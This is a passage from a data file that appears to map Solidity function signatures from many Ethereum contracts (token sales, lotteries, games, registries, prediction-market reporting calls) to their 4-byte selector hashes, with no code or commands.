"_addNewCompanyTraders(uint256)": "0x38194aab", "getTotalNumberOfRegisteredCompanies()": "0x99f6d9af", "getNumberOfSharesForAddress(uint256,address)": "0x6101d16b", "getNumberOfShareHolders(uint256)": "0x0113b261", "getCompanyDetails(uint256)": "0xdaf64aa5", "PARKToken()": "0x3384d2af", "CandyCoinBigBang()": "0x2f581480", "SeeleToken()": "0x49463b8e", "buyTokensWithUpdateRate(address,uint256)": "0xa2325259", "manualBuy(address,uint256)": "0x39c38266", "buyTokensT4T(address)": "0x8269d3c0", "_buyHicsTokens(address,uint256)": "0x05d8c792", "_buyIcsTokens(address,uint256)": "0x3ffc2832", "_changeRate(uint256)": "0x18ee00b6", "changeTokensOwner()": "0x1ba1648a", "withdrawalT4T()": "0xbe8a4737", "withdrawalEth()": "0xd28f95ba", "_forwardT4T(uint256)": "0x39221913", "_getTokenNumberWithBonus(uint256)": "0xce6c0b64", "_getBonusPercent()": "0x0303f694", "refundT4T()": "0xd6f12a6a", "TitanToken()": "0x8ee1409e", "amountFilled(address,uint256,address,uint256,uint256,uint256,address)": "0x2d804ca2", "TokenLab(address,uint256,uint256)": "0x1aa57ec5", "swapTokens()": "0x73d00224", "MultiToken(uint256,string,uint256,string,string,uint256)": "0xe201d466", "NoFakeCoin()": "0x9a7a3293", "fundPuppets()": "0x2daeb49a", "setExtra(uint256,address)": "0x54dfbca8", "newPuppet()": "0x8dd7d6d1", "getPuppetCount()": "0x4962b964", "ViotToken()": "0xb35ae7e8", "endOfPreSale()": "0xd169c869", "addWhiteList(address[])": "0x5e1045ec", "SAGAcrowdSale(address)": "0x8f1cc85e", "StellarToken(uint256,string,uint8,string)": "0xca4398e3", "SWIFTStandardToken(uint256,string,uint8,string)": "0x4a398c11", "OWN_DistributeTokenAdmin_Multi(address[],uint256,bool)": "0x153737f5", "OWN_SmartContract_Allowed(address,bool)": "0x2152b483", "OWN_transferOwnership(address)": "0x71a2e46d", "OWN_kill()": "0x072933e9", "OWN_freezeAddress(address,bool)": "0x1963a0d1", "OWN_mintToken(uint256)": "0xd4403495", "OWN_burnAddress(address,uint256)": "0x6a7c0bae", "OWN_burn(uint256)": "0xb6ceb489", "OWN_ChangeState_locked(bool)": "0xbf0aaaf5", "SmartContract_Allowed(address)": "0xd2656069", "DateCreateToken()": "0x4bbd3061", "RK40Z()": "0xa4144681", "AFSBToken()": "0xd752dd8e", "LDXCToken(uint256)": "0xaedb9eef", "seedWithGasLimit(uint256)": "0xe4cc1161", "seed()": "0x7d94792a", "Security_AddPasswordSha3HashToBankAccount(bytes32)": "0x85e5bb3a", "secureSend(address)": "0xcf1cd249", "seconds_left()": "0xf7c2b38c", "searchSmallestInvestor()": "0x40a49a96", "searchByTag(bytes32)": "0xc82aac47", "searchByOwner(address)": "0x42cf0e72", "searchByName(string)": "0xddbbc35c", "seal()": "0x3fb27b85", "save(string)": "0x38e48f06", "safeToSell(uint256)": "0xa97ffd5e", "_safeSend(address,uint256)": "0x4269d8ef", "safeSend(address)": "0x4401a6e4", "_safeFalse()": "0x2baf4f22", "SafeConditionalHFTransfer()": "0x677cee54", "runPeerBalance()": "0x4d366398", "runLottery()": "0x5674a3ed", "runJackpot()": "0xdd727ea6", "rsplit()": "0x96d02099", "roundMoneyUpToWholeFinney(uint256)": "0x5ccc3eaa", "roundMoneyDownNicely(uint256)": "0xb73405a9", "rollWithSeed(bytes32)": "0x5a7a8850", "roll(uint256,bytes32)": "0x8d216186", "RockPaperScissors()": "0xd2602930", "RobinHoodPonzi()": "0x4e1053cc", "RNG()": "0xf7149220", "rfind()": "0xe1108706", "rfindPtr(uint256,uint256,uint256,uint256)": "0x8390b02a", "_rewireIdentities(bytes32[],uint256,uint256,uint32)": "0x05f8b6f5", "ReversibleDemo()": "0x84ad6ff3", "reveal(uint256,uint256)": "0x9348cef7", "revealCampaign(uint256,uint256)": "0x32d5fe98", "reveal(bytes32,string)": "0x66d8c463", "returnReward(uint256)": "0xebaf7f2f", "returnRandom()": "0x9ec35352", "returnMyMoney(uint256)": "0x7ac4b05e", "returnmoneycreator(uint8,uint256)": "0xec81e22e", "returnFund(address,uint256)": "0x0ca7395f", "_returnFee(address,uint256)": "0xcff2fa42", "returnBounty(uint256)": "0x5cbc85d0", "retryOraclizeRequest(uint256)": "0x85c78fac", "retrieveFunds()": "0x61b20d8c", "resumeContract()": "0xc4bc5da5", "restoreItem(uint256)": "0xa987d654", "restart()": "0x1ef3755d", "resolve(uint8,bytes32,bytes32,bytes32)": "0xa6403636", "resolve(uint8,uint8)": "0x433d4aab", "ResetPonzi()": "0x5cfd8c24", "resetLottery()": "0xd337616e", "resetFoundationtList()": "0xf50d3914", "resetContract()": "0xb181a8fc", "resetAction(uint256)": "0x769796fe", "resetAction(bytes32)": "0x478e25bf", "Reset()": "0x6423db34", "reserved_funds()": "0x6676871d", "reserved(bytes32)": "0x92698814", "reserve(bytes32)": "0x432ced04", "requiredEndowment()": "0xf802075f", "requestTradeDeal(uint256,uint256,string)": "0x0ac28725", "requestTokensBack()": "0x4c9ed763", "requestPeerBalance()": "0xe9c63b9c", "requestPayout(uint256,uint256,bytes32,uint256,uint256)": "0x2e5d1042", "requestFillUp(uint256)": "0x27f06fff", "reqisterListening(address)": "0xeaa1f9fe", "replaceWizardRP(address)": "0xce87f626", "replaceWizard(address)": "0x9fd4f7d1", "replace(address,address)": "0x631de4d6", "repairTheCastle()": "0x7e32a592", "remove(string)": "0x80599e4b", "removeReverse()": "0xf25eb5c1", "removeRegistryFromTagsIndex(address)": "0xaf55bba0", "removeRegistryFromOwnerIndex(address)": "0x669459a7", "removeRegistryFromNameIndex(address)": "0x2c4cb4be", "_removeOperation(bytes32)": "0xba7dc45f", "removeManager(address)": "0xac18de43", "removeDocument(uint256)": "0xd5df7559", "removeCertifier(address)": "0x0066753e", "removeCertificationDocumentInternal(address,bytes32)": "0xba4c206e", "removeCertificationDocumentFromSelf(bytes32)": "0x9c30936f", "removeCertificationDocument(address,bytes32)": "0xf3ee6305", "remove(int256,address)": "0xa7b2d4cb", "release(uint32,uint32,uint32,bytes20)": "0xd67cbec9", "relayReceiveApproval(address,address,uint256,bytes)": "0xc76a4bfb", "reject(string,uint256,uint16,address,uint256)": "0x6d15f208", "Registry()": "0x7db9743b", "registrantRemove(address)": "0xe9fe799e", "registrantApprove(address)": "0x8ae986cf", "RegisterTwo(address,address)": "0xaeb4f0d3", "register(string,string)": "0x3ffbd47f", "register(string)": "0xf2c298be", "RegisterOne(uint32,address,address)": "0x7f6d8955", "registerListening(address)": "0x00e7d289", "registerListening()": "0x68af4971", "registerExternalBill(uint256,address,address,uint256,uint256,uint256)": "0xfe63300a", "RegisterDevice()": "0x669ee827", "registerCompany(address,string)": "0x4cd995da", "registerCertificationDb(address)": "0xb0fd935b", "_register(bytes4,string)": "0x84c344fe", "registerBill(uint256,address,address,uint256,uint256,uint256)": "0x3facd57c", "JaroSleep(address,uint256)": "0xbb262080", "minimumCap()": "0xf381f2a5", "tgrCurrentStage()": "0x932def2e", "tgrNextPartInvestor()": "0x2014c515", "tgrCurrentPartInvestor()": "0x6c7bc902", "tgrStageBlockLeft()": "0xebd9954c", "executeSettingsChange(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xb5b77d7f", "XiaoshiToken()": "0x65033845", "tgrSetFinished()": "0xce5e6393", "tgrSetLive()": "0x29745306", "Venuscoins()": "0x2e8e9bb9", "saleAfterRefundPeriod()": "0xdfcb4157", "saleDuringRefundPeriod()": "0x0a77c3ed", "saleDuringRestrictedPeriod()": "0x16aee925", "grantInitialAllocations()": "0xd405a069", "refundAllEther()": "0xaf8c1946", "refundEther(uint256)": "0xfd535203", "finalizeRefunds()": "0xa26329f0", "setRestrictedParticipationCap(address[],uint256)": "0xe0cfde22", "VITTokenSale(address,uint256,uint256,uint256,uint256,address[20])": "0xf16270c3", "VITToken()": "0xd2fabaec", "OHWOWW()": "0x9683d11d", "withdrawInternal(uint256,bool)": "0xeb5bbef8", "Splitter(address[])": "0x7d7be90f", "APT(address)": "0x812e1d1d", "participantRoundChange(address,address,uint256)": "0x7f004afa", "participantRoundCalced(address,address,uint256)": "0x4ea5195a", "participantRoundRewarded(address,address,uint256)": "0x21853009", "participantRoundAmount(address,address,uint256)": "0xe9a59b32", "participantRoundValue(address,address,uint256)": "0x4f3d3003", "availableFunds()": "0x46fcff4c", "calcICO(uint256,uint256,uint256)": "0xbd6e5e03", "rewardRound(uint256)": "0x3eda009b", "startICO(uint256,uint256,uint256)": "0x5fab11a5", "setMinSalePrice(uint256)": "0x1c4b0da6", "setRecallPercent(uint256)": "0xb804dc56", "setForceContract(address)": "0xd81b1020", "ForceSeller(address)": "0x884ade03", "holdersCount()": "0x6b4ed21b", "holders(uint256)": "0x2a11ced0", "Enrium(uint256,string,uint8,string)": "0xed7305ea", "EPay()": "0xbc4d76e5", "DETEX()": "0xd5c53c44", "Incredibles2RT()": "0x4d85006d", "approveAccount(address,bool)": "0x61e3564f", "RichiumToken(uint256,string,string)": "0x883a584c", "rens()": "0x8d4572be", "mintToken()": "0x2004ffd9", "TokenVesting(address,uint256,uint256,uint256)": "0xea29a210", "NuToken()": "0xfbb4f0e3", "drainRemainingToken()": "0x89f6e826", "GainmersSALE(uint256,uint256)": "0x756b397a", "postBuyTokens()": "0xea06ad02", "ModifiedCrowdsale(uint256,uint256,uint256,address)": "0xc3b9741b", "enableTransferEarlier()": "0x60c71546", "GainmersTOKEN(uint256,uint256,address)": "0xd9be976c", "cfoWithdraw(uint256)": "0x5b588f26", "setSeed(uint256)": "0xc32a50f9", "retrieveCadvsLeftInRefunding()": "0x54f11256", "CoinAdvisorPreIco(address,address,uint256,uint256)": "0xe362f168", "ExtremeToken()": "0x93f2ad91", "BOB()": "0xe4019e07", "drainRemainingToken(address)": "0x4e7445c8", "drainToken(address,uint256)": "0x9d4323be", "updatePresaleWhitelist(address[],bool)": "0xb9022e44", "DinoTokenSale()": "0xfd14492a", "userIsWhitelisted(address)": "0x637bcd2a", "userCanStillBuyEth(address)": "0xc510db20", "userAlreadyBoughtEth(address)": "0xaaa0f5cc", "JCFv1(uint256,string,string,uint8)": "0xfc56200e", "BLUECoin()": "0x54e16753", "transferTicket(address,address)": "0x411f93d1", "getMyTicketAddresses(address)": "0x0c44ba40", "getONETIMESOLD()": "0x2215fc82", "getAllTickets()": "0x03e96fe3", "allocateTicket(address,address)": "0x19ecb310", "TravelCoinToken()": "0x4daade18", "SKToken(uint256,string,string)": "0xbefed472", "addPresaleOrder(address,uint256)": "0xbfb42682", "GdprCrowdsale(uint256,uint256,address)": "0x22f4e916", "GdprCash()": "0x7325b084", "GSDToken()": "0x75335702", "InvestboxToken()": "0x526b71f4", "NomToken()": "0x4932f35e", "bury()": "0x61161aae", "amendRetention(uint8,uint8)": "0x5f5f2aef", "amendEpoch(uint256)": "0x549215a3", "amendClaim(uint8,uint8,uint8,uint8)": "0x7dbc9fba", "_updateLandData(int256,int256,string)": "0xad89e64b", "_tokenMetadata(uint256)": "0xae6a70ee", "_ownerOfLand(int256,int256)": "0xb4c2e22c", "_exists(int256,int256)": "0x4d15d797", "_decodeTokenId(uint256)": "0xedd57e32", "_unsafeDecodeTokenId(uint256)": "0x1c58d0d2", "_unsafeEncodeTokenId(int256,int256)": "0x8a8e3999", "_encodeTokenId(int256,int256)": "0xfe13baf7", "_isUpdateAuthorized(address,uint256)": "0xadde61ef", "_exists(uint256)": "0xf8e76cc0", "_moveToken(address,address,uint256,bytes,address,bool)": "0x1e566dae", "_setApprovalForAll(address,bool)": "0xb93a50b0", "mUpgradeSpeedup()": "0xdfee01d8", "getSMPTokensLeftForICO()": "0x88933e07", "stepPrice()": "0xfa5ba0f9", "COINS_PER_ETH()": "0x47ee2992", "nextPVPBatleBlock()": "0xa48255b7", "firstCrowdSaleDate()": "0x665788f8", "tier_rate_3()": "0xbb1d1cf9", "newClockmaker()": "0x115793d4", "preIcoMaxLasts()": "0x4b313043", "addTime()": "0x8941db65", "distributorWallet()": "0xe236de22", "winPooling()": "0x598052a3", "creatorSupply()": "0x059caad3", "okamiTotalPurchase_()": "0x9eb4da1c", "upgradeGemsSpecial()": "0x6e6b8004", "indSaleDeposit()": "0xbf66a5f9", "kingGladiatorFounder()": "0x3f479562", "End1()": "0x9540cb80", "foundersPercentOfTotal()": "0xbf251bc6", "MyCoins()": "0x61b3516e", "dollarCost()": "0x4fb19db5", "logoId()": "0xef7a4a32", "TotalToken()": "0x3f601972", "partnersReward()": "0x61cac1fb", "RELEASE_INTERVAL()": "0xcde5f58f", "bountyBalance()": "0xd03b41a9", "masterTotalEarning()": "0xe28e6b3a", "rateWithBonus()": "0xe8518dc6", "teamTokensWallet()": "0x6c9d99da", "m_sale()": "0x69f08449", "WEI_RAISED_CAP()": "0xbff41e36", "maxFundsThatCanBeWithdrawnByOwners()": "0xcfcc57ad", "level_3_percent()": "0xa9b8dad6", "finalizeAll()": "0x6025d3e5", "year1Unlock()": "0xf25633dd", "transmitStatus()": "0x173a705f", "getRedemptionBlockNumber()": "0x71bfa03f", "getTokensAvailable()": "0xaaa5ad61", "coinIssuedBurn()": "0x1204d27c", "JUSTed()": "0x0da86f7f", "SETUP()": "0xf6c99dad", "totalEthJackpotRecieved()": "0x8f8b2c9b", "timeoutBlocks()": "0x2ebe14b0", "totalCitizens()": "0xbd7b09e4", "raisedFromFiat()": "0x9c492b9e", "commentsLength()": "0x73db2350", "partnerAddress()": "0x576168fc", "countSecondWinners()": "0x1993584b", "tokenGoal()": "0xb8d1194c", "finishPreSaleRound()": "0x988ba8e8", "NIMFA_PER_ETH_SALE()": "0xb6ba1a98", "maxICOSecondSupply()": "0x80bf549a", "roundOneRate()": "0xf6b3e080", "juryOnlineWallet()": "0x8a863fbd", "JohanNygren()": "0xe5815b33", "tokenFounderLockTime()": "0x0132cc82", "prizeReferee()": "0x82123cd2", "dailyLimitLeft()": "0x6ea007b3", "blockState()": "0x90fd5452", "CoinBroSupply()": "0xd9797076", "evc()": "0x0fb411e8", "installed()": "0x00bdfbcd", "ETHER()": "0x42cb1fbc", "thirdXRChangeBlock()": "0xa43772bd", "dividendinfo()": "0x647d5f14", "creditTokens()": "0x010ae545", "etherPriceInDollarIn()": "0x794ab0a8", "foundationReservation()": "0x8ad476d7", "getBountyTokens()": "0x938f6c5f", "_tenuousToken()": "0x2386d33e", "sumElements(uint64[])": "0xd79e1e7d", "ONTExchangeRate()": "0xe56c10a0", "additionalDebt()": "0x05d8bb97", "expireDelay()": "0x895678a2", "lastBlock_f2()": "0xa6a62d58", "minTxSize()": "0x066c94ba", "coinIssuedPrivate()": "0x88abc4a2", "ipc()": "0xd3c33c52", "isERC821()": "0x9c5686db", "_mainAddress()": "0x88af30c3", "STATUS_DEAL_APPROVE()": "0x6583e239", "lotteryTotalEarning()": "0x15786590", "giveBackEthers()": "0x56a70646", "Total_Investors()": "0xe1ef42b1", "lockFile()": "0xa4ca80be", "getUsersByBalance()": "0x7f1b8cc3", "MAIN_MAX_CAP()": "0xdc6ff38e", "isMaxTokensReached()": "0x8c32e774", "bonusPresale()": "0x0bddb83b", "migrationCountComplete()": "0x51fbfe9d", "fee_registration()": "0x732ef12c", "PRIVATE_SALE_PRICE()": "0xf82ab2ec", "SaleStarted()": "0x912ee23d", "maxContribAmount()": "0x5b9b0609", "getBallotOptNumber()": "0x497b8018", "BONUS_TIER2()": "0xfd600107", "MIN_ETHER()": "0x5cd85187", "oneHundredThousand()": "0xc12fac40", "sectorOwnerCut()": "0xc41728a7", "MARKET_CAP()": "0x8834526a", "__load128(bytes)": "0x1a7c7105", "__mul(bytes,bytes)": "0x7ec650db", "__mod(bytes,bytes)": "0x864a9a09", "__mulmod(bytes,bytes,bytes)": "0xd43ef6b9", "modexp_naive(bytes,uint256,bytes)": "0x595539cd", "modexp(uint256[],uint256,uint256[])": "0xb700967b", "modexp(bytes,uint256,bytes)": "0x8c3e1ff1", "GPSDecayingTokenEnvironment(uint256,uint256)": "0x50ad7321", "adjustRate(uint256)": "0x55b726bc", "donate(address,address,bytes4)": "0x1c9981f8", "Fundraiser(address,address,uint256,uint256,uint256)": "0xd818eb63", "getBytes(bytes32)": "0xc031a180", "addBytes(bytes32,bytes)": "0x83366ab0", "callServer(address,uint256)": "0x5296085e", "addOneRequest(address)": "0xcb645ae2", "getBalance(address,address)": "0xd4fac45d", "transferViaProxy(address,address,address,uint256)": "0xf8c75351", "getUnavailableValueT(bytes32)": "0xaae62507", "getPartialValue(uint256,uint256,uint256)": "0x441b1b44", "batchCancel(address[5][],uint256[6][],uint256[])": "0x50ec2a6a", "fillUpTo(address[5][],uint256[6][],uint256,bool,uint8[],bytes32[],bytes32[])": "0x59b25720", "batchFillOrKill(address[5][],uint256[6][],uint256[],uint8[],bytes32[],bytes32[])": "0xa2e855a5", "batchFill(address[5][],uint256[6][],uint256[],bool,uint8[],bytes32[],bytes32[])": "0x914ff398", "fillOrKill(address[5],uint256[6],uint256,uint8,bytes32,bytes32)": "0xddefdb90", "cancel(address[5],uint256[6],uint256)": "0x08eb4e98", "fill(address[5],uint256[6],uint256,bool,uint8,bytes32,bytes32)": "0x909f617e", "newNode(bytes32,bytes32,bytes32,bytes32,bytes32)": "0x932adda2", "newSection(bytes32,bytes32,bytes32,uint256)": "0xa71acabc", "newIndex(bytes32,uint256)": "0xcf934d67", "Operated(address)": "0xc84c009b", "resetCallsCount()": "0xeee0b552", "expectationsLeft()": "0x898a1813", "assertExpectations()": "0xfc02c1df", "convertToBytes32(uint256)": "0xea0570e0", "expect(address,uint256,bytes,bytes32)": "0x6393b4eb", "ignore(bytes4,bool)": "0xd09e21ee", "is_signed(address,address,bytes32)": "0x09262f71", "get_signature_block(address,address,bytes32)": "0x84f9c928", "get_owner(bytes32)": "0x1af32223", "is_registered(bytes32)": "0xe1479ebe", "get_registrant(bytes32)": "0xe5a9d6b0", "transfer_ownership(bytes32,address)": "0x98b547e0", "sign(bytes32)": "0x799cd333", "ChainSign()": "0x75662b0e", "setTradersProxyContract(address)": "0x4432ce5f", "requestWithdrawal(address,uint256)": "0xda95ebf7", "mint(int256,address,uint256,bool)": "0x27521702", "TrueFlipToken(address)": "0xce4c4a74", "setMintAddress(int256,address)": "0x0550f92f", "getWinningPayoutDistributionHashFromFork()": "0xdcb7f86f", "getReportingState()": "0xc5947cd6", "getAutomatedReportDisputeDueTimestamp()": "0xfee692a3", "getAutomatedReportDueTimestamp()": "0x6bdcdb2d", "getFinalizationTime()": "0xa0e16fed", "getTopic()": "0x95066e33", "getCompleteSetCostInAttotokens()": "0x1ab268d6", "getMinDisplayPrice()": "0xb453afb8", "getMaxDisplayPrice()": "0xeea19185", "getMarketCreatorSettlementFeeInAttoethPerEth()": "0xcd98b214", "getDenominationToken()": "0xdf2a29da", "getPayoutDenominator()": "0xf732eb66", "getFinalPayoutDistributionHash()": "0x8970a0f4", "getShareToken(uint8)": "0x29e8bc0a", "getFinalWinningReportingToken()": "0xbfd8a06e", "getTentativeWinningPayoutDistributionHash()": "0x36bacc7c", "getNumberOfOutcomes()": "0x27ce5b8c", "getAllReportersDisputeBondToken()": "0xeba37dbd", "getLimitedReportersDisputeBondToken()": "0x498eecb2", "getAutomatedReporterDisputeBondToken()": "0x64ccd7a0", "getReportingTokenOrZeroByPayoutDistributionHash(bytes32)": "0x790c33b8", "derivePayoutDistributionHash(uint256[])": "0x173029d7", "transferIncorrectDisputeBondsToWinningReportingToken()": "0x50ea53db", "getReportingToken(uint256[])": "0xb82a65b2", "migrateThroughOneFork()": "0x069b559c", "migrateThroughAllForks()": "0x00987265", "tryFinalize()": "0x338e579e", "updateTentativeWinningPayoutDistributionHash(bytes32)": "0x16d8f16c", "disputeAllReporters()": "0x99ea0fd5", "disputeLimitedReporters()": "0x3f4628c1", "disputeAutomatedReport()": "0x7a13d14c", "automatedReport(uint256[])": "0xbb7d064f", "decreaseMarketCreatorSettlementFeeInAttoethPerEth(uint256)": "0x0ea51122", "approveSpenders()": "0x8d7e8a57", "createShareToken(uint8)": "0x053abd3c", "blockSettlementHash(uint64,uint64)": "0x5bfd8efe", "blockSettlement(uint64,uint64)": "0xd47e81eb", "blockResult(uint64,uint64,uint64)": "0x25e3d3ba", "blockPart(uint64,uint64,uint64)": "0x21d65d80", "channelValidator(uint64,uint64)": "0x3af3db55", "channelParticipant(uint64,uint64)": "0xf4d48c0d", "channelParticipantCount(uint64)": "0xc10fa635", "channelConfiguration(uint64)": "0xe832b482", "channelModule(uint64)": "0x62e28f7d", "blockResolveDispute(uint64,uint64,bytes)": "0x6d0a98cc", "blockSettle(uint64,uint64,bytes)": "0x94532ced", "setBlockResult(uint64,uint64,bytes32)": "0x221ab8e2", "setBlockPart(uint64,uint64,uint64,bytes32,bytes)": "0xc523d5dd", "approve(uint64,address)": "0xae458ab6", "requestClose(uint64)": "0xbef35ccb", "createTokenContract(address)": "0xad84e1be", "TopIvy()": "0xaade84ae", "AMEBToken()": "0x9908d3cf", "colorLeaderboard()": "0x913fb60b", "myColorIs()": "0xf5a23af0", "changeColorWhite()": "0x45cdb714", "changeColorBlack()": "0x168b4a53", "changeColorPink()": "0xaefe696b", "changeColorPurple()": "0x4c922a9f", "changeColorTeal()": "0x4bef71ac", "changeColorBlue()": "0x58990372", "changeColorGreen()": "0x027bd9a8", "changeColorYellow()": "0x43bd6e6f", "changeColorOrange()": "0xb8ec59e4", "changeColorRed()": "0x7d69f335", "setColorWhite()": "0x6b3ad4f8", "setColorBlack()": "0x915015c5", "setColorPink()": "0x9db834fe", "setColorPurple()": "0x95d84d99", "setColorTeal()": "0x2886d76f", "setColorBlue()": "0x3cbeb49a", "setColorGreen()": "0x194f97ba", "setColorYellow()": "0x0ce38276", "setColorOrange()": "0x45f9072b", "setColorRed()": "0x84da7e38", "view70()": "0x07dda675", "view68()": "0xce383ec7", "view66()": "0x34ae6984", "view64()": "0x1a699085", "view62()": "0xcf6bd8b9", "view60()": "0x63c43415", "view58()": "0xc3ceb939", "view56()": "0x775ee3ef", "view54()": "0xde1446e8", "view52()": "0x9739203b", "view50()": "0x2dd28736", "view48()": "0xee7f9c47", "view46()": "0xf5419108", "view44()": "0x45c8e118", "view42()": "0x55be1168", "view40()": "0xb6b3d325", "view38()": "0xb5128f66", "view36()": "0x11886bd4", "view34()": "0x409c962e", "view32()": "0xdc5418b1", "view30()": "0x8c41399c", "view28()": "0x00b99f8c", "view26()": "0xd933dac7", "view24()": "0x565e2220", "view22()": "0xb08ba6a1", "colors()": "0xf8e58024", "FuckCoin()": "0xf5e998f7", "AirCoin(uint256,string,uint8,string)": "0x1afa6542", "initPayoutTable(uint256,uint256)": "0x93004e62", "getTokensAmountUnderCap(uint256)": "0x8047ba70", "open(bool)": "0xa85717d3", "buyAlt(address,uint256,string)": "0x37c3d50d", "EtherusPreSale(address,address,address,address)": "0x4e5b3cb8", "changeWLMWallet(address)": "0x2be8f373", "setMoving()": "0xcb9dd1a0", "OCPresale(address,address,uint256)": "0x6d7a37b6", "BRL_Omnidollar()": "0xbe29d81f", "TokenFactoryCN()": "0x2259315d", "revokeAttributeSigned(address,uint8,bytes32,bytes32,bytes32,bytes)": "0xe476af5c", "revokeAttribute(address,bytes32,bytes)": "0x00c023da", "revokeAttribute(address,address,bytes32,bytes)": "0x655a4ebf", "setAttributeSigned(address,uint8,bytes32,bytes32,bytes32,bytes,uint256)": "0x123b5e98", "setAttribute(address,bytes32,bytes,uint256)": "0x7ad4b0a4", "setAttribute(address,address,bytes32,bytes,uint256)": "0xbd74c4e7", "revokeDelegateSigned(address,uint8,bytes32,bytes32,bytes32,address)": "0x93072684", "revokeDelegate(address,bytes32,address)": "0x80b29f7c", "revokeDelegate(address,address,bytes32,address)": "0xf976104f", "addDelegateSigned(address,uint8,bytes32,bytes32,bytes32,address,uint256)": "0x9c2c1b2b", "addDelegate(address,bytes32,address,uint256)": "0xa7068d66", "addDelegate(address,address,bytes32,address,uint256)": "0x889c10dc", "changeOwnerSigned(address,uint8,bytes32,bytes32,address)": "0x240cf1fa", "validDelegate(address,bytes32,address)": "0x622b2a3c", "checkSignature(address,uint8,bytes32,bytes32,bytes32)": "0x63723373", "identityOwner(address)": "0x8733d4e8", "cancelBet(uint256)": "0x357401f5", "closeBetByCanceling(uint256)": "0x6a7f42e4", "acceptBet(uint256)": "0x6c0c27e1", "createBet(uint256,uint256,uint256,uint256,bool)": "0xac61e92b", "oraclePrice()": "0x668aa824", "setOraclizeGasprice(uint256)": "0xd9b058bd", "EthBetter()": "0xc615365f", "halfMultiplier()": "0x55bcaf06", "replaceChiphash(uint256,bytes32)": "0x15cb75e3", "mintChipUnsafely(uint256,bytes32)": "0x1e04eee9", "VestingVault(address,address,uint256)": "0x03031960", "checkParticipantStatus(address)": "0xe58c8c5c", "revokeParticipation(address)": "0xd50d4822", "verifyParticipant(address)": "0x643a7695", "CrowdSale(address)": "0x9b3cbdf6", "accountOf()": "0x33cdfc76", "accountOf(address)": "0x8086b8ba", "unfrozen(address,uint256)": "0xe5df3dd0", "frozen(address,uint256)": "0x36173764", "HgcToken()": "0xf4d64745", "TradeBitToken()": "0x48727dca", "distributeTeamTokens()": "0x4f11ca65", "getUpgradeInfo(uint256)": "0x28a42e9d", "rareIdRange()": "0x4ecdf165", "battleUnitIdRange()": "0x6026bb86", "productionUnitIdRange()": "0x28bdbdca", "upgradeValue(uint256)": "0x0caeb350", "upgradeUnitId(uint256)": "0x72fecf84", "upgradeClass(uint256)": "0x309ba120", "upgradeEthCost(uint256)": "0xf48aa044", "upgradeGooCost(uint256)": "0x7e0be7e3", "rareStartPrice(uint256)": "0x57f1f6ca", "unitGooProduction(uint256)": "0xc46e3e85", "unitSellable(uint256)": "0x41e34be9", "validRareId(uint256)": "0x0097b607", "getGooCostForUnit(uint256,uint256,uint256)": "0x3837e9bd", "addUpgrade(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x285c7f37", "setConfigSetupContract(address)": "0xb1e50702", "GooGameConfig()": "0x5bc02d5c", "updateGooConfig(address)": "0x7c85a757", "getLatestUnitRaffleInfo()": "0xa7b7f1d4", "getLatestItemRaffleInfo()": "0x64f54a17", "getPlayersUnitTickets(address)": "0x6a7d1a7e", "getPlayersItemTickets(address)": "0x02b68bbf", "getUnitRafflePlayers(uint256)": "0xc9c286c6", "getItemRafflePlayers(uint256)": "0x6c20d755", "viewUnclaimedDepositDividends()": "0x13aa7b6f", "getRareItemInfo()": "0xb1d66003", "getPlayersBattlePower(address,address)": "0x3176f912", "protectAddress(address,bool)": "0x70bc52fb", "migrateV1Upgrades(address[],uint256[],uint256[])": "0x0b407022", "drawRandomUnitWinner()": "0x22bfba59", "drawRandomItemWinner()": "0x4a1d08af", "assignUnitRafflePrize(address)": "0x0ab77095", "assignItemRafflePrize(address)": "0xef01db0e", "awardUnitRafflePrize(address,uint256)": "0x9323eaad", "awardItemRafflePrize(address,uint256)": "0x70d9f7dc", "startUnitRaffle(uint256,uint256)": "0x18d80168", "startItemRaffle(uint256,uint256)": "0x716e5604", "buyUnitRaffleTicket(uint256)": "0x60f61a4c", "buyItemRaffleTicket(uint256)": "0xb912950e", "snapshotDailyGooDepositFunding()": "0xf2f921e6", "snapshotDailyGooResearchFunding()": "0xc38f0741", "claimGooDepositDividends(address,uint256,uint256)": "0x8d4777c8", "claimResearchDividends(address,uint256,uint256)": "0x8fafb286", "buyUpgrade(uint256)": "0xa5a2cb19", "sellUnit(uint256,uint256)": "0x751fef65", "buyEthUnit(uint256,uint256)": "0xd8737d8a", "buyBasicUnit(uint256,uint256)": "0x2bfd2e06", "reducePlayersGooProduction(address,uint256)": "0x26413760", "increasePlayersGooProduction(address,uint256)": "0xa732f9ac", "updatePlayersGooFromPurchase(address,uint256)": "0xdcc439cf", "updatePlayersGoo(address)": "0xb5967e16", "getGooProduction(address)": "0x19e9e5de", "tweakDailyDividends(uint256,uint256)": "0x53dd8881", "beginGame(uint256)": "0x25a7650a", "OwOToken()": "0x3dc09a70", "VDGToken()": "0x628dda8d", "FcsCoin()": "0x3da32dc5", "GiveBlockReward()": "0xa34d5f82", "ChangeMiningReward(uint256)": "0x32619375", "CCRToken()": "0x2cf8a1d6", "HubiiNetworkTokens()": "0xef11ef3d", "CerradoToken()": "0x58189259", "Nothing()": "0xf9820cc1", "CryptoUniversityTuition()": "0xb4037767", "char(bytes1)": "0x69f9ad2f", "toAsciiString(address)": "0x2c6e7598", "_getOriginAddressHash(address,address,string)": "0xfc04a2ec", "_randomize(uint256,uint256)": "0x2b252d17", "confirmAdmin()": "0xf2234f6e", "RetrieveCommissions()": "0xf73e05dd", "Retrieve(string,address)": "0x37ac9153", "SafeGuard(bytes20,uint256,uint16)": "0x86060884", "AuditSafeGuard(bytes20)": "0xafaf6b2e", "AuditBalances()": "0xd86e1850", "whoIsAdmin()": "0x632ce0f8", "showPendingAdmin()": "0x171da314", "CryptoDivert()": "0x49164b41", "OliToken(uint256,string,uint8,string)": "0x7470a835", "addLottery(string,uint32,uint32,uint32)": "0xb0756562", "CSLottery()": "0x517ee2e8", "MarginlessCrowdsale(address)": "0xea4634a7", "PotoToken()": "0x3cc626b6", "setOperations(address)": "0xc32c1e65", "deployConsortium(address)": "0x7f63af42", "allocatePresaleTokens(address,uint256,uint64,uint64,bool,bool)": "0xf08ccd02", "setArtcoin(address,address,address)": "0xe1c80391", "ArtSale(address,address,uint256,uint256,uint256,uint256,uint8,uint256)": "0x22408401", "BITVM()": "0x4331576f", "FishFarmer()": "0xb5c6b5a2", "suicide()": "0xc96cd46f", "ShitToken(address)": "0x6f4d6f5d", "Gummy()": "0xa87d2321", "SerenityTeamAllocator()": "0x418599cb", 